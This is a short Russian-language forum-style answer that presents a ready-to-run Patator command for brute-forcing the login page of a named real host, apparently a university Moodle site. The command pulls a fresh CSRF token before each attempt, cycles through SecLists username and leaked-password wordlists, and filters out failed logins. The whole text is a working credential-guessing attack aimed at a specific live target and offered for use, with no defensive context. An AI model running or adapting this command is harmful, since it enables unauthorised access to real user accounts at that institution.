Решение
Patator выше 0.6-й версии позволяет перед каждым запросом вытаскивать CSRF-token
Bash:
patator.py http_fuzz method=POST follow=1 accept_cookie=1 --threads=1 timeout=5 --max-retries=0 url="http://vns.lpnu.ua/login/index.php" body="anchor=&logintoken=_CSRF_&username=FILE0&password=FILE1" header="Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7" 0=/opt/SecLists/Usernames/top-usernames-shortlist.txt 1=/opt/SecLists/Passwords/darkweb2017-top10.txt before_urls="http://vns.lpnu.ua/login/index.php" before_header="Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7" before_egrep='_CSRF_:<input type="hidden" name="logintoken" value="(\w+)">' -x ignore:fgrep='Invalid login'